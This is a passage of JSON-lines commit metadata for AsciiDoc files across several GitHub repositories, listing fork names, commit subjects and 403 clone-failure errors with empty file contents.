rch,robin13\/elasticsearch,markllama\/elasticsearch,awislowski\/elasticsearch,pablocastro\/elasticsearch,rento19962\/elasticsearch,HonzaKral\/elasticsearch,infusionsoft\/elasticsearch,amit-shar\/elasticsearch,humandb\/elasticsearch,Collaborne\/elasticsearch,MetSystem\/elasticsearch,wangyuxue\/elasticsearch,opendatasoft\/elasticsearch,pozhidaevak\/elasticsearch,weipinghe\/elasticsearch,Stacey-Gammon\/elasticsearch,lmtwga\/elasticsearch,nezirus\/elasticsearch,abhijitiitr\/es,onegambler\/elasticsearch,schonfeld\/elasticsearch,pranavraman\/elasticsearch,jprante\/elasticsearch,polyfractal\/elasticsearch,bestwpw\/elasticsearch,pranavraman\/elasticsearch,shreejay\/elasticsearch,alexkuk\/elasticsearch,jw0201\/elastic,bestwpw\/elasticsearch,mrorii\/elasticsearch,sc0ttkclark\/elasticsearch,awislowski\/elasticsearch,nrkkalyan\/elasticsearch,mjhennig\/elasticsearch,Collaborne\/elasticsearch,andrejserafim\/elasticsearch,ZTE-PaaS\/elasticsearch,nellicus\/elasticsearch,pranavraman\/elasticsearch,kubum\/elasticsearch,kingaj\/elasticsearch,artnowo\/elasticsearch,hydro2k\/elasticsearch,wayeast\/elasticsearch,KimTaehee\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,obourgain\/elasticsearch,phani546\/elasticsearch,kubum\/elasticsearch,phani546\/elasticsearch,martinstuga\/elasticsearch,jaynblue\/elasticsearch,pritishppai\/elasticsearch,wenpos\/elasticsearch,amaliujia\/elasticsearch,masaruh\/elasticsearch,tsohil\/elasticsearch,strapdata\/elassandra,cwurm\/elasticsearch,szroland\/elasticsearch,dongjoon-hyun\/elasticsearch,koxa29\/elasticsearch,artnowo\/elasticsearch,rmuir\/elasticsearch,achow\/elasticsearch,dongjoon-hyun\/elasticsearch,brwe\/elasticsearch,jeteve\/elasticsearch,Uiho\/elasticsearch,chrismwendt\/elasticsearch,Shekharrajak\/elasticsearch,Flipkart\/elasticsearch,ricardocerq\/elasticsearch,Helen-Zhao\/elasticsearch,mbrukman\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,markharwood\/elasticsearch,adrianbk\/elasticsearch,rhoml\/elasticsearch,NBSW\/elasticsearch,sneivandt\/elasticsearch,davidvgalbraith\/elasticsearch,andrestc\/elasticsearch,lydonchandra\/elasticsearch,tahaemin\/elasticsearch,yuy168\/elasticsearch,slavau\/elasticsearch,weipinghe\/elasticsearch,knight1128\/elasticsearch,Uiho\/elasticsearch,nilabhsagar\/elasticsearch,JackyMai\/elasticsearch,kkirsche\/elasticsearch,tebriel\/elasticsearch,Ansh90\/elasticsearch,truemped\/elasticsearch,pablocastro\/elasticsearch,yuy168\/elasticsearch,Brijeshrpatel9\/elasticsearch,fooljohnny\/elasticsearch,lzo\/elasticsearch-1,davidvgalbraith\/elasticsearch,jeteve\/elasticsearch,yynil\/elasticsearch,phani546\/elasticsearch,LeoYao\/elasticsearch,ajhalani\/elasticsearch,scorpionvicky\/elasticsearch,aglne\/elasticsearch,TonyChai24\/ESSource,kaneshin\/elasticsearch,bestwpw\/elasticsearch,vietlq\/elasticsearch,EasonYi\/elasticsearch,davidvgalbraith\/elasticsearch,Charlesdong\/elasticsearch,MaineC\/elasticsearch,djschny\/elasticsearch,andrestc\/elasticsearch,Siddartha07\/elasticsearch,sc0ttkclark\/elasticsearch,sneivandt\/elasticsearch,hanswang\/elasticsearch,ajhalani\/elasticsearch,vingupta3\/elasticsearch,dpursehouse\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,hirdesh2008\/elasticsearch,tebriel\/elasticsearch,robin13\/elasticsearch,sreeramjayan\/elasticsearch,Widen\/elasticsearch,JervyShi\/elasticsearch,mute\/elasticsearch,janmejay\/elasticsearch,scorpionvicky\/elasticsearch,onegambler\/elasticsearch,mm0\/elasticsearch,elasticdog\/elasticsearch,pablocastro\/elasticsearch,mjhennig\/elasticsearch,EasonYi\/elasticsearch,Liziyao\/elasticsearch,wangtuo\/elasticsearch,nellicus\/elasticsearch,dylan8902\/elasticsearch,szroland\/elasticsearch,snikch\/elasticsearch,sposam\/elasticsearch,AndreKR\/elasticsearch,MetSystem\/elasticsearch,adrianbk\/elasticsearch,sdauletau\/elasticsearch,rajanm\/elasticsearch,wuranbo\/elasticsearch,petmit\/elasticsearch,vvcephei\/elasticsearch,masterweb121\/elasticsearch,yongminxia\/elasticsearch,YosuaMichael\/elasticsearch,sposam\/elasticsearch,masterweb121\/elasticsearch,episerver\/elasticsearch,strapdata\/elassandra-test,javachengwc\/elasticsearch,diendt\/elasticsearch,LeoYao\/elasticsearch,coding0011\/elasticsearch,smflorentino\/elasticsearch,Widen\/elasticsearch,caengcjd\/elasticsearch,scottsom\/elasticsearch,Charlesdong\/elasticsearch,18098924759\/elasticsearch,lightslife\/elasticsearch,masterweb121\/elasticsearch,palecur\/elasticsearch,lzo\/elasticsearch-1,lks21c\/elasticsearch,jaynblue\/elasticsearch,kunallimaye\/elasticsearch,MichaelLiZhou\/elasticsearch,szroland\/elasticsearch,socialrank\/elasticsearch,wuranbo\/elasticsearch,kunallimaye\/elasticsearch,sc0ttkclark\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,cnfire\/elasticsearch-1,nellicus\/elasticsearch,Microsoft\/elasticsearch,NBSW\/elasticsearch,Stacey-Gammon\/elasticsearch,mortonsykes\/elasticsearch,umeshdangat\/elasticsearch,szroland\/elasticsearch,Uiho\/elasticsearch,mnylen\/elasticsearch,AshishThakur\/elasticsearch,golubev\/elasticsearch,nazarewk\/elasticsearch,henakamaMSFT\/elasticsearch,jimhooker2002\/elasticsearch,micpalmia\/elasticsearch,anti-social\/elasticsearch,strapdata\/elassandra-test,fekaputra\/elasticsearch,robin13\/elasticsearch,drewr\/elasticsearch,Flipkart\/elasticsearch,fernandozhu\/elasticsearch,golubev\/elasticsearch,scorpionvicky\/elasticsearch,bestwpw\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,areek\/elasticsearch,mgalushka\/elasticsearch,18098924759\/elasticsearch,JSCooke\/elasticsearch,iantruslove\/elasticsearch,fekaputra\/elasticsearch,skearns64\/elasticsearch,gfyoung\/elasticsearch,mrorii\/elasticsearch,girirajsharma\/elasticsearch,markllama\/elasticsearch,Rygbee\/elasticsearch,iacdingping\/elasticsearch,JervyShi\/elasticsearch,strapdata\/elassandra5-rc,snikch\/elasticsearch,fred84\/elasticsearch,wenpos\/elasticsearch,mnylen\/elasticsearch,vroyer\/elasticassandra,zeroctu\/elasticsearch,kevinkluge\/elasticsearch,xuzha\/elasticsearch,nazarewk\/elasticsearch,Brijeshrpatel9\/elasticsearch,vroyer\/elasticassandra,weipinghe\/elasticsearch,lzo\/elasticsearch-1,s1monw\/elasticsearch,heng4fun\/elasticsearch,lightslife\/elasticsearch,geidies\/elasticsearch,franklanganke\/elasticsearch,hafkensite\/elasticsearch,Fsero\/elasticsearch,SergVro\/elasticsearch,18098924759\/elasticsearch,kaneshin\/elasticsearch,xuzha\/elasticsearch,karthikjaps\/elasticsearch,Uiho\/elasticsearch,mcku\/elasticsearch,milodky\/elasticsearch,zkidkid\/elasticsearch,ThalaivaStars\/OrgRepo1,gingerwizard\/elasticsearch,mkis-\/elasticsearch,infusionsoft\/elasticsearch,zeroctu\/elasticsearch,javachengwc\/elasticsearch,nezirus\/elasticsearch,queirozfcom\/elasticsearch,andrejserafim\/elasticsearch,skearns64\/elasticsearch,Asimov4\/elasticsearch,brwe\/elasticsearch,alexbrasetvik\/elasticsearch,diendt\/elasticsearch,beiske\/elasticsearch,amit-shar\/elasticsearch,wimvds\/elasticsearch,markharwood\/elasticsearch,lzo\/elasticsearch-1,kubum\/elasticsearch,episerver\/elasticsearch,pritishppai\/elasticsearch,vingupta3\/elasticsearch,lmtwga\/elasticsearch,kubum\/elasticsearch,sarwarbhuiyan\/elasticsearch,JSCooke\/elasticsearch,jsgao0\/elasticsearch,amit-shar\/elasticsearch,nomoa\/elasticsearch,mnylen\/elasticsearch,petabytedata\/elasticsearch,AshishThakur\/elasticsearch,wbowling\/elasticsearch,xpandan\/elasticsearch,jango2015\/elasticsearch,hechunwen\/elasticsearch,iacdingping\/elasticsearch,trangvh\/elasticsearch,jbertouch\/elasticsearch,andrejserafim\/elasticsearch,PhaedrusTheGreek\/elasticsearch,iantruslove\/elasticsearch,ydsakyclguozi\/elasticsearch,camilojd\/elasticsearch,mkis-\/elasticsearch,MisterAndersen\/elasticsearch,yuy168\/elasticsearch,djschny\/elasticsearch,mjhennig\/elasticsearch,jango2015\/elasticsearch,kenshin233\/elasticsearch,aglne\/elasticsearch,mmaracic\/elasticsearch,hafkensite\/elasticsearch,hechunwen\/elasticsearch,jbertouch\/elasticsearch,vingupta3\/elasticsearch,JervyShi\/elasticsearch,xuzha\/elasticsearch,coding0011\/elasticsearch,iacdingping\/elasticsearch,clintongormley\/elasticsearch,jango2015\/elasticsearch,mcku\/elasticsearch,himanshuag\/elasticsearch,MjAbuz\/elasticsearch,mikemccand\/elasticsearch,maddin2016\/elasticsearch,tebriel\/elasticsearch,masterweb121\/elasticsearch,javachengwc\/elasticsearch,tcucchietti\/elasticsearch,EasonYi\/elasticsearch,milodky\/elasticsearch,lks21c\/elasticsearch,Brijeshrpatel9\/elasticsearch,caengcjd\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,kcompher\/elasticsearch,tahaemin\/elasticsearch,sc0ttkclark\/elasticsearch,AndreKR\/elasticsearch,kcompher\/elasticsearch,tkssharma\/elasticsearch,tebriel\/elasticsearch,mbrukman\/elasticsearch,mapr\/elasticsearch,sc0ttkclark\/elasticsearch,mjason3\/elasticsearch,ydsakyclguozi\/elasticsearch,ouyangkongtong\/elasticsearch,tahaemin\/elasticsearch,yongminxia\/elasticsearch,elancom\/elasticsearch,nezirus\/elasticsearch,rlugojr\/elasticsearch,iantruslove\/elasticsearch,awislowski\/elasticsearch,henakamaMSFT\/elasticsearch,LewayneNaidoo\/elasticsearch,YosuaMichael\/elasticsearch,chrismwendt\/elasticsearch,avikurapati\/elasticsearch,Helen-Zhao\/elasticsearch,davidvgalbraith\/elasticsearch,rento19962\/elasticsearch,schonfeld\/elasticsearch,infusionsoft\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,baishuo\/elasticsearch_v2.1.0-baishuo,zhaocloud\/elasticsearch,nazarewk\/elasticsearch,vroyer\/elassandra,tkssharma\/elasticsearch,ajhalani\/elasticsearch,jchampion\/elasticsearch,martinstuga\/elasticsearch,kcompher\/elasticsearch,dongjoon-hyun\/elasticsearch,myelin\/elasticsearch,likaiwalkman\/elasticsearch,overcome\/elasticsearch,ckclark\/elasticsearch,feiqitian\/elasticsearch,gingerwizard\/elasticsearch,mkis-\/elasticsearch,Chhunlong\/elasticsearch,uschindler\/elasticsearch,franklanganke\/elasticsearch,socialrank\/elasticsearch,sscarduzio\/elasticsearch,achow\/elasticsearch,SergVro\/elasticsearch,kcompher\/elasticsearch,Kakakakakku\/elasticsearch,F0lha\/elasticsearch,umeshdangat\/elasticsearch,karthikjaps\/elasticsearch,HarishAtGitHub\/elasticsearch,rlugojr\/elasticsearch,ouyangkongtong\/elasticsearch,kingaj\/elasticsearch,wayeast\/elasticsearch,AshishThakur\/elasticsearch,likaiwalkman\/elasticsearch,micpalmia\/elasticsearch,rlugojr\/elasticsearch,cwurm\/elasticsearch,obourgain\/elasticsearch,NBSW\/elasticsearch,karthikjaps\/elasticsearch,trangvh\/elasticsearch,huanzhong\/elasticsearch,episerver\/elasticsearch,jpountz\/elasticsearch,ydsakyclguozi\/elasticsearch,JSCooke\/elasticsearch,mm0\/elasticsearch,nrkkalyan\/elasticsearch,strapdata\/elassandra,palecur\/elasticsearch,martinstuga\/elasticsearch,diendt\/elasticsearch,wittyameta\/elasticsearch,njlawton\/elasticsearch,andrestc\/elasticsearch,Shekharrajak\/elasticsearch,hydro2k\/elasticsearch,obourgain\/elasticsearch,sauravmondallive\/elasticsearch,khiraiwa\/elasticsearch,petabytedata\/elasticsearch,drewr\/elasticsearch,rmuir\/elasticsearch,linglaiyao1314\/elasticsearch,fred84\/elasticsearch,koxa29\/elasticsearch,phani546\/elasticsearch,hirdesh2008\/elasticsearch,rlugojr\/elasticsearch,chirilo\/elasticsearch,mohit\/elasticsearch,F0lha\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mmaracic\/elasticsearch,xingguang2013\/elasticsearch,easonC\/elasticsearch,Brijeshrpatel9\/elasticsearch,jeteve\/elasticsearch,chrismwendt\/elasticsearch,yynil\/elasticsearch,yongminxia\/elasticsearch,thecocce\/elasticsearch,geidies\/elasticsearch,wimvds\/elasticsearch,xuzha\/elasticsearch,tkssharma\/elasticsearch,beiske\/elasticsearch,nomoa\/elasticsearch,koxa29\/elasticsearch,ckclark\/elasticsearch,markllama\/elasticsearch,petabytedata\/elasticsearch,jbertouch\/elasticsearch,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,opendatasoft\/elasticsearch,hanst\/elasticsearch,Clairebi\/ElasticsearchClone,mbrukman\/elasticsearch,NBSW\/elasticsearch,masterweb121\/elasticsearch,fooljohnny\/elasticsearch,jimczi\/elasticsearch,rento19962\/elasticsearch,yanjunh\/elasticsearch,ydsakyclguozi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jpountz\/elasticsearch,btiernay\/elasticsearch,gmarz\/elasticsearch,vingupta3\/elasticsearch,fforbeck\/elasticsearch,Uiho\/elasticsearch,sreeramjayan\/elasticsearch,schonfeld\/elasticsearch,yynil\/elasticsearch,weipinghe\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,yongminxia\/elasticsearch,codebunt\/elasticsearch,schonfeld\/elasticsearch,AndreKR\/elasticsearch,wangtuo\/elasticsearch,lchennup\/elasticsearch,khiraiwa\/elasticsearch,ulkas\/elasticsearch,rajanm\/elasticsearch,dpursehouse\/elasticsearch,lmtwga\/elasticsearch,pranavraman\/elasticsearch,sdauletau\/elasticsearch,javachengwc\/elasticsearch,vietlq\/elasticsearch,polyfractal\/elasticsearch,xingguang2013\/elasticsearch,zeroctu\/elasticsearch,jimczi\/elasticsearch,yuy168\/elasticsearch,zeroctu\/elasticsearch,hydro2k\/elasticsearch,ESamir\/elasticsearch,ImpressTV\/elasticsearch,boliza\/elasticsearch,trangvh\/elasticsearch,kubum\/elasticsearch,rhoml\/elasticsearch,jango2015\/elasticsearch,overcome\/elasticsearch,dataduke\/elasticsearch,sposam\/elasticsearch,fekaputra\/elasticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,GlenRSmith\/elasticsearch,alexbrasetvik\/elasticsearch,MjAbuz\/elasticsearch,milodky\/elasticsearch,kalburgimanjunath\/elasticsearch,smflorentino\/elasticsearch,sposam\/elasticsearch,kunallimaye\/elasticsearch,lchennup\/elasticsearch,rhoml\/elasticsearch,tcucchietti\/elasticsearch,humandb\/elasticsearch,ESamir\/elasticsearch,girirajsharma\/elasticsearch,ivansun1010\/elasticsearch,petabytedata\/elasticsearch,fforbeck\/elasticsearch,Siddartha07\/elasticsearch,avikurapati\/elasticsearch,pritishppai\/elasticsearch,jpountz\/elasticsearch,bestwpw\/elasticsearch,ThalaivaStars\/OrgRepo1,vrkansagara\/elasticsearch,lydonchandra\/elasticsearch,aglne\/elasticsearch,zhiqinghuang\/elasticsearch,areek\/elasticsearch,vvcephei\/elasticsearch,peschlowp\/elasticsearch,ImpressTV\/elasticsearch,rajanm\/elasticsearch,kenshin233\/elasticsearch,smflorentino\/elasticsearch,naveenhooda2000\/elasticsearch,fernandozhu\/elasticsearch,TonyChai24\/ESSource,ZTE-PaaS\/elasticsearch,KimTaehee\/elasticsearch,jbertouch\/elasticsearch,i-am-Nathan\/elasticsearch,huypx1292\/elasticsearch,rmuir\/elasticsearch,areek\/elasticsearch,MetSystem\/elasticsearch,weipinghe\/elasticsearch,Flipkart\/elasticsearch,StefanGor\/elasticsearch,abhijitiitr\/es,Rygbee\/elasticsearch,Shepard1212\/elasticsearch,areek\/elasticsearch,jimhooker2002\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,boliza\/elasticsearch,andrestc\/elasticsearch,iantruslove\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,wbowling\/elasticsearch,tebriel\/elasticsearch,trangvh\/elasticsearch,shreejay\/elasticsearch,aglne\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,kenshin233\/elasticsearch,luiseduardohdbackup\/elasticsearch,markharwood\/elasticsearch,uschindler\/elasticsearch,Shepard1212\/elasticsearch,MaineC\/elasticsearch,ouyangkongtong\/elasticsearch,naveenhooda2000\/elasticsearch,chirilo\/elasticsearch,mcku\/elasticsearch,ivansun1010\/elasticsearch,sjohnr\/elasticsearch,cnfire\/elasticsearch-1,wayeast\/elasticsearch,VukDukic\/elasticsearch,AshishThakur\/elasticsearch,sarwarbhuiyan\/elasticsearch,kalimatas\/elasticsearch,huanzhong\/elasticsearch,LewayneNaidoo\/elasticsearch,jbertouch\/elasticsearch,drewr\/elasticsearch,sauravmondallive\/elasticsearch,acchen97\/elasticsearch,obourgain\/elasticsearch,Clairebi\/ElasticsearchClone,zhaocloud\/elasticsearch,easonC\/elasticsearch,pozhidaevak\/elasticsearch,apepper\/elasticsearch,yanjunh\/elasticsearch,amit-shar\/elasticsearch,SergVro\/elasticsearch,a2lin\/elasticsearch,iamjakob\/elasticsearch,andrestc\/elasticsearch,khiraiwa\/elasticsearch,Collaborne\/elasticsearch,beiske\/elasticsearch,dylan8902\/elasticsearch,ckclark\/elasticsearch,camilojd\/elasticsearch,strapdata\/elassandra5-rc,YosuaMichael\/elasticsearch,springning\/elasticsearch,hirdesh2008\/elasticsearch,IanvsPoplicola\/elasticsearch,onegambler\/elasticsearch,brandonkearby\/elasticsearch,gingerwizard\/elasticsearch,masterweb121\/elasticsearch,heng4fun\/elasticsearch,elancom\/elasticsearch,kalburgimanjunath\/elasticsearch,AndreKR\/elasticsearch,hirdesh2008\/elasticsearch,lchennup\/elasticsearch,micpalmia\/elasticsearch,tsohil\/elasticsearch,alexkuk\/elasticsearch,wenpos\/elasticsearch,jango2015\/elasticsearch,mrorii\/elasticsearch,tsohil\/elasticsearch,mmaracic\/elasticsearch,luiseduardohdbackup\/elasticsearch,yynil\/elasticsearch,jchampion\/elasticsearch,elasticdog\/elasticsearch,tsohil\/elasticsearch,btiernay\/elasticsearch,wuranbo\/elasticsearch,gfyoung\/elasticsearch,hanswang\/elasticsearch,bestwpw\/elasticsearch,pritishppai\/elasticsearch,dantuffery\/elasticsearch,drewr\/elasticsearch,18098924759\/elasticsearch,HarishAtGitHub\/elasticsearch,Kakakakakku\/elasticsearch,socialrank\/elasticsearch,markllama\/elasticsearch,MetSystem\/elasticsearch,mjhennig\/elasticsearch,awislowski\/elasticsearch,mikemccand\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,coding0011\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,StefanGor\/elasticsearch,mgalushka\/elasticsearch,Shekharrajak\/elasticsearch,wuranbo\/elasticsearch,petmit\/elasticsearch,rlugojr\/elasticsearch,mkis-\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/stop-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/stop-tokenfilter.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b4cbff58c5482ff328fd971dcb3147bff05e2a2","subject":"SEC-2782: Additional Updates to Migration Guide from 3.x to 4.x","message":"SEC-2782: Additional Updates to Migration Guide from 3.x to 4.x\n","repos":"zgscwjm\/spring-security,Peter32\/spring-security,jgrandja\/spring-security,zshift\/spring-security,rwinch\/spring-security,liuguohua\/spring-security,mrkingybc\/spring-security,hippostar\/spring-security,zhaoqin102\/spring-security,mparaz\/spring-security,mounb\/spring-security,likaiwalkman\/spring-security,zshift\/spring-security,follow99\/spring-security,fhanik\/spring-security,mounb\/spring-security,ollie314\/spring-security,jgrandja\/spring-security,cyratech\/spring-security,MatthiasWinzeler\/spring-security,panchenko\/spring-security,rwinch\/spring-security,adairtaosy\/spring-security,thomasdarimont\/spring-security,ractive\/spring-security,driftman\/spring-security,SanjayUser\/SpringSecurityPro,MatthiasWinzeler\/spring-security,MatthiasWinzeler\/spring-security,caiwenshu\/spring-security,Xcorpio\/spring-security,jmnarloch\/spring-security,wkorando\/spring-security,liuguohua\/spring-security,rwinch\/spring-security,mdeinum\/spring-security,ajdinhedzic\/spring-security,follow99\/spring-security,SanjayUser\/SpringSecurityPro,raindev\/spring-security,xingguang2013\/spring-security,raindev\/spring-security,eddumelendez\/spring-security,thomasdarimont\/spring-security,thomasdarimont\/spring-security,chinazhaoht\/spring-security,driftman\/spring-security,rwinch\/spring-security,MatthiasWinzeler\/spring-security,zhaoqin102\/spring-security,mounb\/spring-security,mparaz\/spring-security,pkdevbox\/spring-security,adairtaosy\/spring-security,olezhuravlev\/spring-security,diegofernandes\/spring-security,pwheel\/spring-security,mrkingybc\/spring-security,SanjayUser\/SpringSecurityPro,mounb\/spring-security,kazuki43zoo\/spring-security,diegofernandes\/spring-security,Peter32\/spring-security,caiwenshu\/spring-security,zgscwjm\/spring-security,ollie314\/spring-security,hippostar\/spring-security,yinhe402\/spring-security,diegofernandes\/spring-security,kazuki43zoo\/spring-security,olezhuravlev\/spring-security,olezhuravlev\/spring-security,eddumelendez\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,mparaz\/spring-security,fhanik\/spring-security,driftman\/spring-security,Xcorpio\/spring-security,djechelon\/spring-security,rwinch\/spring-security,fhanik\/spring-security,Krasnyanskiy\/spring-security,mdeinum\/spring-security,forestqqqq\/spring-security,ractive\/spring-security,ajdinhedzic\/spring-security,ollie314\/spring-security,Peter32\/spring-security,ractive\/spring-security,kazuki43zoo\/spring-security,yinhe402\/spring-security,kazuki43zoo\/spring-security,likaiwalkman\/spring-security,kazuki43zoo\/spring-security,diegofernandes\/spring-security,spring-projects\/spring-security,SanjayUser\/SpringSecurityPro,ractive\/spring-security,panchenko\/spring-security,raindev\/spring-security,mdeinum\/spring-security,wkorando\/spring-security,spring-projects\/spring-security,jmnarloch\/spring-security,mrkingybc\/spring-security,hippostar\/spring-security,djechelon\/spring-security,pwheel\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,Krasnyanskiy\/spring-security,driftman\/spring-security,forestqqqq\/spring-security,liuguohua\/spring-security,spring-projects\/spring-security,adairtaosy\/spring-security,spring-projects\/spring-security,cyratech\/spring-security,thomasdarimont\/spring-security,xingguang2013\/spring-security,SanjayUser\/SpringSecurityPro,mdeinum\/spring-security,eddumelendez\/spring-security,pkdevbox\/spring-security,Peter32\/spring-security,zgscwjm\/spring-security,caiwenshu\/spring-security,Krasnyanskiy\/spring-security,fhanik\/spring-security,zhaoqin102\/spring-security,panchenko\/spring-security,panchenko\/spring-security,olezhuravlev\/spring-security,Xcorpio\/spring-security,forestqqqq\/spring-security,wkorando\/spring-security,pwheel\/spring-security,likaiwalkman\/spring-security,caiwenshu\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,wkorando\/spring-security,cyratech\/spring-security,pwheel\/spring-security,fhanik\/spring-security,chinazhaoht\/spring-security,adairtaosy\/spring-security,yinhe402\/spring-security,jmnarloch\/spring-security,follow99\/spring-security,fhanik\/spring-security,likaiwalkman\/spring-security,zgscwjm\/spring-security,Krasnyanskiy\/spring-security,djechelon\/spring-security,mparaz\/spring-security,hippostar\/spring-security,xingguang2013\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,pwheel\/spring-security,yinhe402\/spring-security,chinazhaoht\/spring-security,ajdinhedzic\/spring-security,spring-projects\/spring-security,forestqqqq\/spring-security,follow99\/spring-security,jmnarloch\/spring-security,djechelon\/spring-security,liuguohua\/spring-security,pkdevbox\/spring-security,xingguang2013\/spring-security,zhaoqin102\/spring-security,zshift\/spring-security,cyratech\/spring-security,mrkingybc\/spring-security,thomasdarimont\/spring-security,Xcorpio\/spring-security,djechelon\/spring-security,olezhuravlev\/spring-security,ajdinhedzic\/spring-security,zshift\/spring-security,chinazhaoht\/spring-security,ollie314\/spring-security,pkdevbox\/spring-security,raindev\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/migrate-3-to-4.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/migrate-3-to-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aae67e2528b2e97d395fc2d399ade7f1e1a968ba","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79730bfeba4ceb03dc03b4503958a79fa2362d4a","subject":"Create LICENSE.adoc","message":"Create LICENSE.adoc","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"LICENSE.adoc","new_file":"LICENSE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08c51ab7ea1f5b68afc2335d11bd0262f8e84f74","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3fca1e22624eb62e8b9bb97f2d2be6b9f9d9ee1","subject":"Add a readme file for documentation. Fixes #151","message":"Add a readme file for documentation. Fixes #151\n","repos":"canoo\/dolphin-platform,canoo\/dolphin-platform,canoo\/dolphin-platform","old_file":"documentation\/README.adoc","new_file":"documentation\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/canoo\/dolphin-platform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cfaf0fa7bf40fe01a4f723890a52ed57639e01e2","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4044dbc61b165f732ad1239a6fd12d555b266b9","subject":"Update 2018-06-17-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-17-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-17-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-17-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff1f688659f59301ba8b5327a278e1950084378c","subject":"Update 2016-10-26-Episode-76-Steam-Saves-and-Managing-Friends.adoc","message":"Update 2016-10-26-Episode-76-Steam-Saves-and-Managing-Friends.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-10-26-Episode-76-Steam-Saves-and-Managing-Friends.adoc","new_file":"_posts\/2016-10-26-Episode-76-Steam-Saves-and-Managing-Friends.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2fe913433c37c6f12848227369dffc59b04ec77e","subject":"ns Forms Guide","message":"ns Forms Guide\n\nFixes 